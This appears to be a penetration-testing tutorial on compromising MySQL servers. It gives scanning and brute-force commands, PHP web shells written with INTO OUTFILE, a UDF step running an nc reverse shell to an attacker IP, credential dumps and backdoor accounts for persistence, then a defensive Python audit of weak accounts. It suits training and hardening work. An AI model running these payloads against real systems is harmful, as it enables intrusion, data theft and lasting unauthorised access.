Breaking into MySQL:
MySQL is one of the most popular relational databases in the world—and often overlooked as a foothold during penetration tests. With poor configurations, weak credentials, and overly permissive access, MySQL can go from backend database to full system compromise.
Let’s walk through how to discover, enumerate, exploit, and post-exploit MySQL like a true offensive operator.
1. What is MySQL?
MySQL is an open-source relational database management system (RDBMS) that uses SQL (Structured Query Language) for managing data. It’s commonly used in web applications and can be a gateway to sensitive user data, internal logic, and sometimes even system shells.
🔑 Key Details:
- Default Port: 3306 (TCP)
- Auth Methods: Username + password (local or remote)
- Common Weaknesses:
  - Default credentials (root:root, root:mysql)
  - Remote root login enabled
  - SQL Injection leading to credential extraction
  - File read/write from within SQL queries
  - Privilege escalation via UDFs or OS interaction
2. Scanning for MySQL
Nmap
nmap -p 3306 -sV <target>
Nmap Script Scan
nmap -p 3306 --script mysql-info,mysql-users,mysql-databases,mysql-empty-password,mysql-brute <target>
- mysql-info: Gets MySQL server version and protocol details.
- mysql-empty-password: Tests for empty passwords.
- mysql-brute: Performs a dictionary attack.
- mysql-users: Enumerates valid usernames (if allowed).
- mysql-databases: Tries to list databases (rare unless anonymous or creds are known).
3. MySQL Enumeration
Using Metasploit
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login
Login scanner helps validate user/pass combos:
set USERNAME root
set PASSWORD root
set RHOSTS <target>
run
Using mysql CLI
mysql -h <target> -u root -p
If successful, enumerate:
SHOW DATABASES;
SELECT user, host, authentication_string FROM mysql.user;
Using hydra
hydra -L users.txt -P passwords.txt -s 3306 <target> mysql
4. Exploiting MySQL
Let’s weaponize access.
Default or Weak Credentials
Still common in dev/staging environments:
mysql -h <target> -u root -p
Try no password first.
SQL Injection → MySQL Access
If a web app uses MySQL and is vulnerable to SQLi:
- Extract usernames/hashes
- Write files to disk via:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';
File Read/Write (With FILE Privilege)
If you can log in and have FILE privileges:
SELECT LOAD_FILE('/etc/passwd');
Or drop a web shell:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/backdoor.php';
User-Defined Functions (UDF) for RCE
If you can write to plugin directories and have root MySQL:
- Upload a malicious .so file (Linux) or .dll (Windows)
- Load it as a UDF:
CREATE FUNCTION do_system RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
SELECT do_system('nc -e /bin/bash <attacker-ip> <port>');
Escaping the Database
- Check for root access inside MySQL:
SELECT user(), current_user(), version();
- If you can execute shell commands with \! (older/rare), it’s over.
5. Post-Exploitation
Data Exfiltration
- Dump all users and hashes:
SELECT user, host, authentication_string FROM mysql.user;
- Dump tables:
USE <database>;
SHOW TABLES;
SELECT * FROM <table>;
Privilege Escalation
- Check for stored procedures with dangerous functionality
- Abuse GRANT privileges to create more users:
GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%' IDENTIFIED BY 'hackme' WITH GRANT OPTION;
Persistence
- Create a user with remote access from anywhere:
CREATE USER 'evil'@'%' IDENTIFIED BY 'p@ssw0rd';
GRANT ALL PRIVILEGES ON *.* TO 'evil'@'%';
- Set up triggers or scheduled events to reinfect if cleaned
Clean Up
- Remove any files dropped (e.g., shells, UDFs)
- Drop any backdoor users or procedures
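Every technique in sections 4 and 5 depends on a handful of account and server settings: remote root, empty passwords, anonymous users, FILE or GRANT OPTION on wildcard-host accounts, and an unrestricted secure_file_priv. The audit below, an added example that is not part of the original post, flags those conditions from a dump of mysql.user; the Account class is a hypothetical helper mirroring the query columns, and the rows are constructed sample data.

```python
from dataclasses import dataclass

# Hypothetical helper: each Account mirrors one row of
# SELECT user, host, authentication_string, File_priv, Grant_priv FROM mysql.user
@dataclass(frozen=True)
class Account:
    user: str
    host: str
    authentication_string: str
    file_priv: str   # 'Y' or 'N'
    grant_priv: str  # 'Y' or 'N'

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Constructed sample rows (placeholder hashes, not real credentials).
SAMPLE_ROWS = [
    Account("root", "localhost", "*PLACEHOLDER_HASH_1", "Y", "Y"),
    Account("root", "%", "*PLACEHOLDER_HASH_1", "Y", "Y"),          # remote root
    Account("webapp", "10.0.0.5", "*PLACEHOLDER_HASH_2", "N", "N"),  # least privilege
    Account("", "localhost", "", "N", "N"),                          # anonymous, no password
    Account("evil", "%", "*PLACEHOLDER_HASH_3", "Y", "Y"),           # backdoor-style account
]

def audit_accounts(rows):
    """Return (user, host, finding) tuples for the weak patterns discussed above."""
    findings = []
    for a in rows:
        if a.user == "":
            findings.append((a.user, a.host, "anonymous account"))
        if a.authentication_string == "":
            findings.append((a.user, a.host, "empty password"))
        if a.user == "root" and a.host not in LOCAL_HOSTS:
            findings.append((a.user, a.host, "root login allowed remotely"))
        if a.host == "%" and a.file_priv == "Y":
            findings.append((a.user, a.host, "FILE privilege on wildcard host"))
        if a.host == "%" and a.grant_priv == "Y":
            findings.append((a.user, a.host, "GRANT OPTION on wildcard host"))
    return findings

def file_priv_is_constrained(secure_file_priv):
    """secure_file_priv as returned by SELECT @@secure_file_priv: None (NULL)
    disables LOAD_FILE/INTO OUTFILE, a directory confines them, and an empty
    string leaves them unrestricted, which is what the OUTFILE web shell above needs."""
    return secure_file_priv is None or secure_file_priv.strip() != ""

if __name__ == "__main__":
    for user, host, finding in audit_accounts(SAMPLE_ROWS):
        print(f"{user or '<anonymous>'}@{host}: {finding}")
```

Run the same query on a live server and feed its rows in; any finding maps directly to a section above and to the fix (drop the account, restrict the host, REVOKE FILE, or set secure_file_priv).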
TryHackMe Rooms to Practice MySQL Attacks
- Injection – Great for SQLi basics that lead into DB access
- Relevant – Has a MySQL privilege escalation vector
- Mr Robot – Data dumping after web exploitation
Final Thoughts
MySQL isn’t just a backend—it can be a wide-open gateway into the system. With access, you’re often just one clever query away from file access, shell, or full system takeover. If you spot port 3306, treat it with curiosity and caution—especially if you’re facing a misconfigured root login.
